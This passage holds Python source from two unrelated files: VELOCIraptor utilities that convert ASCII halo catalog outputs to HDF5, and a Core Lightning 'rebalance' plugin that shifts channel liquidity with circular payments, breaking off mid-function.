    #NOTE(review): with exactly one halo np.loadtxt yields a 1-D array, so
    #htemp[ikeys] is a scalar - original behaviour, confirm downstream handling
    if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
    else: htemp=[[] for ikeys in range(len(fieldnames))]
    for ikeys in range(len(fieldnames)):
        #ID/count columns keep integer types; everything else is stored as float
        if (fieldnames[ikeys]=="ID"):
            dtype=np.uint64
        elif (fieldnames[ikeys] in ["ID_mbp","hostHaloID"]):
            dtype=np.int64
        elif (fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]):
            dtype=np.uint64
        else:
            dtype=np.float64
        hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=dtype))
    hdffile.close()
def ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
    """
    Reads an ASCII file and converts it to the HDF format for VELOCIraptor properties files.

    Parameters
    ----------
    basefilename : string
        base name; input is basefilename+".properties" (with ".N" suffixes when MPI split)
        and output is basefilename+".hdf.properties" alongside it
    iseparatesubfiles : int
        if 1, also convert the matching ".sublevels" property files
    iverbose : int
        if nonzero, print progress information

    Returns
    -------
    [] on failure to find the input file, otherwise None (files are written as a side effect).
    """
    inompi=True
    if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
    filename=basefilename+".properties"
    #load header; the presence of basefilename itself signals a non-MPI run
    if (os.path.isfile(basefilename)==True):
        numfiles=0
    else:
        filename=basefilename+".properties"+".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found")
            return []
    byteoffset=0
    #read header information from the first file to get the property column names
    halofile = open(filename, 'r')
    [filenum,numfiles]=halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    [numhalos, numtothalos]= halofile.readline().split()
    numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
    names = ((halofile.readline())).split()
    #remove the brackets in ascii file names
    fieldnames= [fieldname.split("(")[0] for fieldname in names]
    halofile.close()
    #convert each (sub)file via the shared helper (previously duplicated inline)
    for ifile in range(numfiles):
        if (inompi==True):
            filename=basefilename+".properties"
            hdffilename=basefilename+".hdf.properties"
        else:
            filename=basefilename+".properties"+"."+str(ifile)
            hdffilename=basefilename+".hdf.properties"+"."+str(ifile)
        _ConvertASCIIPropertyFileToHDFSingle(filename,hdffilename,fieldnames,iverbose)
    #if subhalos are written in separate files, then convert them too
    if (iseparatesubfiles==1):
        for ifile in range(numfiles):
            if (inompi==True):
                filename=basefilename+".sublevels"+".properties"
                hdffilename=basefilename+".hdf"+".sublevels"+".properties"
            else:
                filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
                hdffilename=basefilename+".hdf"+".sublevels"+".properties"+"."+str(ifile)
            _ConvertASCIIPropertyFileToHDFSingle(filename,hdffilename,fieldnames,iverbose)
def _ConvertASCIICatalogGroupsFileToHDFSingle(filename,hdffilename,fieldnames,fieldtype,iverbose):
    """
    Convert one ASCII VELOCIraptor .catalog_groups file into its HDF5 equivalent.
    Writes the header datasets, then one typed dataset per catalog field.
    """
    if (iverbose) : print("reading ",filename)
    halofile = open(filename, 'r')
    hdffile=h5py.File(hdffilename,'w')
    [filenum,numfiles]=halofile.readline().split()
    [numhalos, numtothalos]= halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
    #write header info
    hdffile.create_dataset("File_id",data=np.array([filenum]))
    hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
    hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]))
    hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]))
    halofile.close()
    if (numhalos>0):
        #the ascii body is one flat column of values: Group_Size, Offset,
        #Offset_unbound, Number_of_substructures_in_halo, Parent_halo_ID,
        #each of length numhalos, concatenated in that order
        cattemp = np.loadtxt(filename,skiprows=2).transpose()
        for ikeys in range(len(fieldnames)):
            hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
    else:
        for ikeys in range(len(fieldnames)):
            hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
    hdffile.close()
def ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
    """
    Reads an ASCII file and converts it to the HDF format for VELOCIraptor catalog_groups files.

    Parameters
    ----------
    basefilename : string
        base name; input is basefilename+".catalog_groups" (with ".N" suffixes when MPI split)
        and output is basefilename+".hdf.catalog_groups" alongside it
    iseparatesubfiles : int
        if 1, also convert the matching ".sublevels" catalog_groups files
    iverbose : int
        if nonzero, print progress information

    Returns
    -------
    [] on failure to find the input file, otherwise None (files are written as a side effect).
    """
    inompi=True
    #message corrected: this routine handles catalog_groups files, not properties
    if (iverbose): print("reading catalog_groups file and converting to hdf",basefilename,os.path.isfile(basefilename))
    filename=basefilename+".catalog_groups"
    #load header; the presence of basefilename itself signals a non-MPI run
    if (os.path.isfile(basefilename)==True):
        numfiles=0
    else:
        filename=basefilename+".catalog_groups"+".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found")
            return []
    byteoffset=0
    #read header information from the first file to get the number of files
    halofile = open(filename, 'r')
    [filenum,numfiles]=halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    [numhalos, numtothalos]= halofile.readline().split()
    numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
    halofile.close()
    fieldnames=["Group_Size","Offset","Offset_unbound","Number_of_substructures_in_halo","Parent_halo_ID"]
    fieldtype=[np.uint32,np.uint64,np.uint64,np.uint32,np.int64]
    #convert each (sub)file via the shared helper (previously duplicated inline)
    for ifile in range(numfiles):
        if (inompi==True):
            filename=basefilename+".catalog_groups"
            hdffilename=basefilename+".hdf.catalog_groups"
        else:
            filename=basefilename+".catalog_groups"+"."+str(ifile)
            hdffilename=basefilename+".hdf.catalog_groups"+"."+str(ifile)
        _ConvertASCIICatalogGroupsFileToHDFSingle(filename,hdffilename,fieldnames,fieldtype,iverbose)
    #if subhalos are written in separate files, then convert them too
    if (iseparatesubfiles==1):
        for ifile in range(numfiles):
            if (inompi==True):
                filename=basefilename+".sublevels"+".catalog_groups"
                hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"
            else:
                filename=basefilename+".sublevels"+".catalog_groups"+"."+str(ifile)
                hdffilename=basefilename+".hdf"+".sublevels"+".catalog_groups"+"."+str(ifile)
            _ConvertASCIICatalogGroupsFileToHDFSingle(filename,hdffilename,fieldnames,fieldtype,iverbose)
def ConvertASCIICatalogParticleFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
    """
    Reads an ASCII VELOCIraptor .catalog_particles file (the .unbound variant
    when iunbound>0, plus the .sublevels variants when iseparatesubfiles==1)
    and converts it to the HDF format for VELOCIraptor files.

    The ASCII layout is a two line header ("<file_id> <num_files>" then
    "<num_in_file> <total_num>") followed by one particle ID per line.
    Returns [] when the input file cannot be found, otherwise None.
    """
    def _convert_one(filename,hdffilename):
        #convert a single ASCII particle list file into its HDF5 counterpart
        halofile = open(filename, 'r')
        hdffile=h5py.File(hdffilename,'w')
        [filenum,numfiles]=halofile.readline().split()
        [numhalos, numtothalos]= halofile.readline().split()
        filenum=int(filenum);numfiles=int(numfiles)
        numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
        #write header info
        hdffile.create_dataset("File_id",data=np.array([filenum]))
        hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
        hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]))
        hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]))
        halofile.close()
        #body is one particle ID per line
        if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
        else: cattemp=[]
        hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
        hdffile.close()
    inompi=True
    if (iverbose): print("reading particle file and converting to hdf",basefilename,os.path.isfile(basefilename))
    filename=basefilename+".catalog_particles"
    if (iunbound>0): filename+=".unbound"
    #load header: a non-MPI run writes a single file without a task suffix,
    #otherwise fall back to the ".0" file of a multi-file (MPI) output.
    #BUGFIX: the existence check must use the constructed catalog filename;
    #checking the bare basefilename (only a prefix, normally not a file itself)
    #made single-file outputs always take the multi-file fallback and fail.
    if (os.path.isfile(filename)==True):
        numfiles=0
    else:
        filename+=".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found")
            return []
    #read header information to learn how many files make up this output
    halofile = open(filename, 'r')
    [filenum,numfiles]=halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    halofile.close()
    unbound=".unbound" if (iunbound>0) else ""
    for ifile in range(numfiles):
        suffix="" if (inompi) else "."+str(ifile)
        filename=basefilename+".catalog_particles"+unbound+suffix
        hdffilename=basefilename+".hdf.catalog_particles"+unbound+suffix
        if (iverbose) : print("reading ",filename)
        _convert_one(filename,hdffilename)
    #if subhalos are written in separate files, then read them too
    #(sublevels files never carry the .unbound suffix)
    if (iseparatesubfiles==1):
        for ifile in range(numfiles):
            suffix="" if (inompi) else "."+str(ifile)
            filename=basefilename+".sublevels"+".catalog_particles"+suffix
            hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"+suffix
            if (iverbose) : print("reading ",filename)
            _convert_one(filename,hdffilename)
def ConvertASCIICatalogParticleTypeFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
    """
    Reads an ASCII VELOCIraptor .catalog_parttypes file (the .unbound variant
    when iunbound>0, plus the .sublevels variants when iseparatesubfiles==1)
    and converts it to the HDF format for VELOCIraptor files.

    The ASCII layout is a two line header ("<file_id> <num_files>" then
    "<num_in_file> <total_num>") followed by one particle type per line.
    Returns [] when the input file cannot be found, otherwise None.
    """
    def _convert_one(filename,hdffilename):
        #convert a single ASCII particle type file into its HDF5 counterpart
        halofile = open(filename, 'r')
        hdffile=h5py.File(hdffilename,'w')
        [filenum,numfiles]=halofile.readline().split()
        [numhalos, numtothalos]= halofile.readline().split()
        filenum=int(filenum);numfiles=int(numfiles)
        numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
        #write header info
        hdffile.create_dataset("File_id",data=np.array([filenum]))
        hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
        hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]))
        hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]))
        halofile.close()
        #body is one particle type per line
        if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
        else: cattemp=[]
        hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
        hdffile.close()
    inompi=True
    if (iverbose): print("reading parttypes file and converting to hdf",basefilename,os.path.isfile(basefilename))
    filename=basefilename+".catalog_parttypes"
    if (iunbound>0): filename+=".unbound"
    #load header: a non-MPI run writes a single file without a task suffix,
    #otherwise fall back to the ".0" file of a multi-file (MPI) output.
    #BUGFIX: the existence check must use the constructed catalog filename;
    #checking the bare basefilename (only a prefix, normally not a file itself)
    #made single-file outputs always take the multi-file fallback and fail.
    if (os.path.isfile(filename)==True):
        numfiles=0
    else:
        filename+=".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found")
            return []
    #read header information to learn how many files make up this output
    halofile = open(filename, 'r')
    [filenum,numfiles]=halofile.readline().split()
    filenum=int(filenum);numfiles=int(numfiles)
    halofile.close()
    unbound=".unbound" if (iunbound>0) else ""
    for ifile in range(numfiles):
        suffix="" if (inompi) else "."+str(ifile)
        filename=basefilename+".catalog_parttypes"+unbound+suffix
        hdffilename=basefilename+".hdf.catalog_parttypes"+unbound+suffix
        if (iverbose) : print("reading ",filename)
        _convert_one(filename,hdffilename)
    #if subhalos are written in separate files, then read them too
    #(sublevels files never carry the .unbound suffix)
    if (iseparatesubfiles==1):
        for ifile in range(numfiles):
            suffix="" if (inompi) else "."+str(ifile)
            filename=basefilename+".sublevels"+".catalog_parttypes"+suffix
            hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"+suffix
            if (iverbose) : print("reading ",filename)
            _convert_one(filename,hdffilename)
def ConvertASCIIToHDF(basefilename,iseparatesubfiles=0,itype=0,iverbose=0):
    """
    Convert the full set of ASCII VELOCIraptor outputs (properties, catalog
    groups, bound and unbound particle lists, and — when itype==1 — the
    particle type files as well) to their HDF counterparts.
    """
    ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles,iverbose)
    ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles,iverbose)
    #bound (0) and unbound (1) particle lists
    for iunbound in (0,1):
        ConvertASCIICatalogParticleFileToHDF(basefilename,iunbound,iseparatesubfiles,iverbose)
    if (itype==1):
        for iunbound in (0,1):
            ConvertASCIICatalogParticleTypeFileToHDF(basefilename,iunbound,iseparatesubfiles,iverbose)
|
rebalance.py | #!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
    """Fill in 'msatoshi', 'amount_msat' and 'delay' for every hop, walking
    the route backwards and accumulating each channel's fee and CLTV delta."""
    cltv = plugin.cltv_final
    amount = msatoshi
    for hop in reversed(route):
        hop['msatoshi'] = amount.millisatoshis
        hop['amount_msat'] = amount
        hop['delay'] = cltv
        listed = plugin.rpc.listchannels(hop['channel'])
        chan = next(c for c in listed.get('channels') if c['destination'] == hop['id'])
        # BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
        hop_fee = Millisatoshi(chan['base_fee_millisatoshi'])
        hop_fee += (amount * chan['fee_per_millionth'] + 10**6 - 1) // 10**6  # integer math trick to round up
        amount += hop_fee
        cltv += chan['delay']
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
    """Return the channel dict for `scid` from listpeers; when check_state is
    set, require CHANNELD_NORMAL state and a connected peer (RpcError otherwise)."""
    peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
    channel = next(ch for ch in peer['channels'] if ch.get('short_channel_id') == scid)
    if check_state:
        state = channel['state']
        if state != "CHANNELD_NORMAL":
            raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, state)})
        if not peer['connected']:
            raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
    return channel
def amounts_from_scid(plugin, scid):
    """Look up channel `scid` in listfunds and return (our_msat, total_msat)."""
    funds = plugin.rpc.listfunds().get('channels')
    chan = next(c for c in funds if c.get('short_channel_id') == scid)
    return Millisatoshi(chan['our_amount_msat']), Millisatoshi(chan['amount_msat'])
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
    """Return the remote node id of our channel `short_channel_id`; raises a
    'rebalance' RpcError when we are not a party of that channel."""
    for channel in plugin.rpc.listchannels(short_channel_id).get('channels'):
        if channel['source'] == my_node_id:
            return channel['destination']
    raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
def find_worst_channel(route):
    """Return the hop charging the highest fee, measured as the drop in
    'msatoshi' relative to the previous hop. The first two hops and the final
    hop involve our own channels and are never candidates; a route shorter
    than 4 hops therefore has no candidate and yields None. Ties keep the
    earliest hop, matching a left-to-right scan."""
    if len(route) < 4:
        return None
    def fee_of(i):
        # fee taken by hop i = what hop i-1 forwards minus what hop i forwards
        return route[i - 1]['msatoshi'] - route[i]['msatoshi']
    worst_idx = max(range(2, len(route) - 1), key=fee_of)
    return route[worst_idx]
def cleanup(plugin, label, payload, rpc_result, error=None):
    """Delete the rebalance invoice and produce the final RPC result.

    'rebalance' RpcErrors are unwrapped into a normal result dict; other
    RpcErrors are re-raised. Note: isinstance(None, RpcError) is False, so the
    original `error is not None and isinstance(...)` guard collapses to a
    plain isinstance check."""
    try:
        plugin.rpc.delinvoice(label, 'unpaid')
    except RpcError as e:
        # race condition: waitsendpay timed out, but invoice get paid
        if 'status is paid' in e.error.get('message', ""):
            return rpc_result
    if isinstance(error, RpcError):
        if error.method == "rebalance":
            # unwrap rebalance errors as 'normal' RPC result
            return {"status": "exception",
                    "message": error.error.get('message', "error not given")}
        raise error
    return rpc_result
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error when this isn't possible.
#
# EXAMPLE
# |------------------- out_total -------------|
# OUT -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN +v <= |-- in_ours --||---------- in_theirs ---------| <= -v
# |--------- in_total --------------------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
# O* vo = out_ours - (out_total/2)
# I* vi = (in_total/2) - in_ours
# return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
    """Calculate the optimal rebalance amount (see the comment block above):
    take whichever 50/50-restoring amount fits the capacity of both channels,
    preferring the smaller one when both fit. Raises a 'rebalance' RpcError
    when rebalancing these channels cannot improve anything."""
    out_ours, out_total = int(out_ours), int(out_total)
    in_ours, in_total = int(in_ours), int(in_total)
    in_theirs = in_total - in_ours
    # amounts that would bring the outgoing / incoming channel to 50/50
    vo = int(out_ours - (out_total / 2))
    vi = int((in_total / 2) - in_ours)
    vo_fits = 0 < vo < in_theirs   # vo is positive and the incoming side can absorb it
    vi_fits = 0 < vi < out_ours    # vi is positive and the outgoing side can provide it
    # cases where one option can be eliminated because it exceeds other capacity
    if vo > in_theirs and vi_fits:
        return Millisatoshi(vi)
    if vi > out_ours and vo_fits:
        return Millisatoshi(vo)
    # cases where one channel is still capable to bring other to balance
    if vo < 0 and vi_fits:
        return Millisatoshi(vi)
    if vi < 0 and vo_fits:
        return Millisatoshi(vo)
    # when both options are possible take the one with least effort
    if vo_fits and vi_fits:
        return Millisatoshi(min(vi, vo))
    raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
class NoRouteException(Exception):
    """Internal signal raised by the getroute strategies when the route search
    space is exhausted and no (more) suitable routes can be found."""
    pass
def getroute_basic(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
    """ This does not make special assumptions and tries all routes
    it gets. Uses less CPU and does not filter any routes.

    Raises NoRouteException when getroute reports no more routes (code 205);
    any other RpcError is re-raised unchanged.
    """
    # NOTE: the docstring used to sit inside the try block, where it is an
    # ordinary expression statement, not a docstring; moved to function level
    # for consistency with getroute_iterative.
    try:
        return plugin.rpc.getroute(targetid,
                                   fromid=fromid,
                                   exclude=excludes,
                                   msatoshi=msatoshi,
                                   maxhops=plugin.maxhops,
                                   riskfactor=10, cltv=9)
    except RpcError as e:
        # could not find route -> change params and restart loop
        if e.method == "getroute" and e.error.get('code') == 205:
            raise NoRouteException
        raise e
def getroute_iterative(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
    """ This searches for 'shorter and bigger pipes' first in order
    to increase likelihood of success on short timeout.
    Can be useful for manual `rebalance`.

    State machine on plugin.maxhopidx / plugin.msatfactoridx: each failed
    attempt lowers the capacity factor; when the factor reaches neutral the
    hop limit is raised and the factor reset, until plugin.maxhops is hit.
    """
    try:
        return plugin.rpc.getroute(targetid,
                                   fromid=fromid,
                                   exclude=excludes,
                                   msatoshi=msatoshi * plugin.msatfactoridx,
                                   maxhops=plugin.maxhopidx,
                                   riskfactor=10, cltv=9)
    except RpcError as e:
        # could not find route -> change params and restart loop
        if e.method == "getroute" and e.error.get('code') == 205:
            # reduce _msatfactor to look for smaller channels now
            plugin.msatfactoridx -= 1
            if plugin.msatfactoridx < 1:
                # when we reached neutral msat factor:
                # increase _maxhops and restart with msatfactor
                plugin.maxhopidx += 1
                plugin.msatfactoridx = plugin.msatfactor
            # abort if we reached maxhop limit
            if plugin.maxhops > 0 and plugin.maxhopidx > plugin.maxhops:
                raise NoRouteException
        # re-raise so the caller's retry loop sees the original error
        raise e
def getroute_switch(method_name):
    """Map a getroute strategy name to its implementation; anything other
    than "basic" (including unknown names) selects the iterative strategy."""
    if method_name == "basic":
        return getroute_basic
    return getroute_iterative
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
              retry_for: int = 60, maxfeepercent: float = 0.5,
              exemptfee: Millisatoshi = Millisatoshi(5000),
              getroute_method=None):
    """Rebalancing channel liquidity with circular payments.
    This tool helps to move some msatoshis between your channels.
    """
    # normalize/validate parameters (RPC may deliver them as strings)
    if msatoshi:
        msatoshi = Millisatoshi(msatoshi)
    retry_for = int(retry_for)
    maxfeepercent = float(maxfeepercent)
    if getroute_method is None:
        getroute = plugin.getroute
    else:
        getroute = getroute_switch(getroute_method)
    exemptfee = Millisatoshi(exemptfee)
    # payload is echoed back in every RpcError we raise
    payload = {
        "outgoing_scid": outgoing_scid,
        "incoming_scid": incoming_scid,
        "msatoshi": msatoshi,
        "retry_for": retry_for,
        "maxfeepercent": maxfeepercent,
        "exemptfee": exemptfee
    }
    my_node_id = plugin.rpc.getinfo().get('id')
    outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
    incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
    # both channels must be CHANNELD_NORMAL with connected peers
    get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
    get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
    out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
    in_ours, in_total = amounts_from_scid(plugin, incoming_scid)
    # If amount was not given, calculate a suitable 50/50 rebalance amount
    if msatoshi is None:
        msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
        plugin.log("Estimating optimal amount %s" % msatoshi)
    # Check requested amounts are selected channels
    if msatoshi > out_ours or msatoshi > in_total - in_ours:
        raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})
    plugin.log(f"starting rebalance out_scid:{outgoing_scid} in_scid:{incoming_scid} amount:{msatoshi}", 'debug')
    # first and last hop of the circular route are our own channels
    route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
    route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
    start_ts = int(time.time())
    label = "Rebalance-" + str(uuid.uuid4())
    description = "%s to %s" % (outgoing_scid, incoming_scid)
    invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
    payment_hash = invoice['payment_hash']
    # The requirement for payment_secret coincided with its addition to the invoice output.
    payment_secret = invoice.get('payment_secret')
    rpc_result = None
    excludes = [my_node_id]  # exclude all own channels to prevent shortcuts
    nodes = {}  # here we store erring node counts
    plugin.maxhopidx = 1  # start with short routes and increase
    plugin.msatfactoridx = plugin.msatfactor  # start with high capacity factor
    # and decrease to reduce WIRE_TEMPORARY failures because of imbalances
    # 'disable' maxhops filter if set to <= 0
    # I know this is ugly, but we don't ruin the rest of the code this way
    if plugin.maxhops <= 0:
        plugin.maxhopidx = 20
    # trace stats
    count = 0
    count_sendpay = 0
    time_getroute = 0
    time_sendpay = 0
    try:
        # keep retrying route candidates until we succeed, run out of time,
        # or a stop is requested via plugin.rebalance_stop
        while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
            count += 1
            try:
                time_start = time.time()
                r = getroute(plugin,
                             targetid=incoming_node_id,
                             fromid=outgoing_node_id,
                             excludes=excludes,
                             msatoshi=msatoshi)
                time_getroute += time.time() - time_start
            except NoRouteException:
                # no more chance for a successful getroute
                rpc_result = {'status': 'error', 'message': 'No suitable routes found'}
                return cleanup(plugin, label, payload, rpc_result)
            except RpcError as e:
                # getroute can be successful next time with different parameters
                if e.method == "getroute" and e.error.get('code') == 205:
                    continue
                else:
                    raise e
            route_mid = r['route']
            route = [route_out] + route_mid + [route_in]
            setup_routing_fees(plugin, route, msatoshi)
            fees = route[0]['amount_msat'] - msatoshi
            # check fee and exclude worst channel the next time
            # NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
            if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
                worst_channel = find_worst_channel(route)
                if worst_channel is None:
                    raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
                excludes.append(worst_channel['channel'] + '/' + str(worst_channel['direction']))
                continue
            rpc_result = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
                          "outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "complete",
                          "message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
            plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
            for r in route:
                plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')
            time_start = time.time()
            count_sendpay += 1
            try:
                # pay our own invoice over the circular route
                plugin.rpc.sendpay(route, payment_hash, payment_secret=payment_secret)
                running_for = int(time.time()) - start_ts
                result = plugin.rpc.waitsendpay(payment_hash, max(retry_for - running_for, 0))
                time_sendpay += time.time() - time_start
                if result.get('status') == "complete":
                    rpc_result["stats"] = f"running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}"
                    return cleanup(plugin, label, payload, rpc_result)
            except RpcError as e:
                time_sendpay += time.time() - time_start
                plugin.log(f"maxhops:{plugin.maxhopidx} msatfactor:{plugin.msatfactoridx} running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}", 'debug')
                # plugin.log(f"RpcError: {str(e)}", 'debug')
                # check if we ran into the `rpc.waitsendpay` timeout
                if e.method == "waitsendpay" and e.error.get('code') == 200:
                    raise RpcError("rebalance", payload, {'message': 'Timeout reached'})
                # check if we have problems with our own channels
                erring_node = e.error.get('data', {}).get('erring_node')
                erring_channel = e.error.get('data', {}).get('erring_channel')
                erring_direction = e.error.get('data', {}).get('erring_direction')
                if erring_channel == incoming_scid:
                    raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
                if erring_channel == outgoing_scid:
                    raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
                # exclude other erroring channels
                if erring_channel is not None and erring_direction is not None:
                    excludes.append(erring_channel + '/' + str(erring_direction))
                # count and exclude nodes that produce a lot of errors
                if erring_node and plugin.erringnodes > 0:
                    if nodes.get(erring_node) is None:
                        nodes[erring_node] = 0
                    nodes[erring_node] += 1
                    if nodes[erring_node] >= plugin.erringnodes:
                        excludes.append(erring_node)
    except Exception as e:
        # any unexpected error: still delete the invoice before reporting
        return cleanup(plugin, label, payload, rpc_result, e)
    rpc_result = {'status': 'error', 'message': 'Timeout reached'}
    return cleanup(plugin, label, payload, rpc_result)
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
    """Saturating subtraction: a - b, clamped to zero, because a Millisatoshi
    value cannot be negative."""
    if a > b:
        return a - b
    return Millisatoshi(0)
def must_send(liquidity):
    """Liquidity is too high, must send some sats: the amount the remote side
    is short of its minimum."""
    return a_minus_b(liquidity["min"], liquidity["their"])


def should_send(liquidity):
    """Liquidity is a bit high, would be good to send some sats towards the
    ideal split."""
    return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])


def could_send(liquidity):
    """Liquidity maybe a bit low, but this much can still be sent, if needed."""
    return a_minus_b(liquidity["our"], liquidity["min"])


def must_receive(liquidity):
    """Liquidity is too low, must receive some sats: the amount our side is
    short of its minimum."""
    return a_minus_b(liquidity["min"], liquidity["our"])


def should_receive(liquidity):
    """Liquidity is a bit low, would be good to receive some sats towards the
    ideal split."""
    return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])


def could_receive(liquidity):
    """Liquidity maybe a bit high, but this much can still be received, if needed."""
    return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
    """Return all public channels of ours in CHANNELD_NORMAL state."""
    return [ch
            for peer in plugin.rpc.listpeers()["peers"]
            for ch in peer["channels"]
            if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]]
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
    """Check if overall rebalances can be successful with this per-channel
    threshold: the summed reserve must stay below both our total liquidity
    and the remote total liquidity."""
    ours = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    required = Millisatoshi(0)
    for ch in channels:
        # a channel can never reserve more than half its capacity
        required += min(threshold, ch["total_msat"] / 2)
    return required < ours and required < total - ours
def get_enough_liquidity_threshold(channels: list):
    """Binary-search (to 1sat precision) the largest per-channel liquidity
    reserve that overall rebalancing can still satisfy, then back off to half
    of that value."""
    low = Millisatoshi(0)
    high = max(channels, key=lambda ch: ch["total_msat"])["total_msat"] / 2
    mid = (low + high) / 2
    while high - low >= Millisatoshi("1sat"):
        if check_liquidity_threshold(channels, mid):
            low = mid
        else:
            high = mid
        mid = (low + high) / 2
    return mid / 2
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
    # ideal liquidity ratio for big channels:
    # small channels should have a 50/50 liquidity ratio to be usable
    # and big channels can store the remaining liquidity above the threshold
    assert len(channels) > 0
    our = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    chs = list(channels)  # get a copy!
    while len(chs) > 0:
        ratio = int(our) / int(total)
        smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
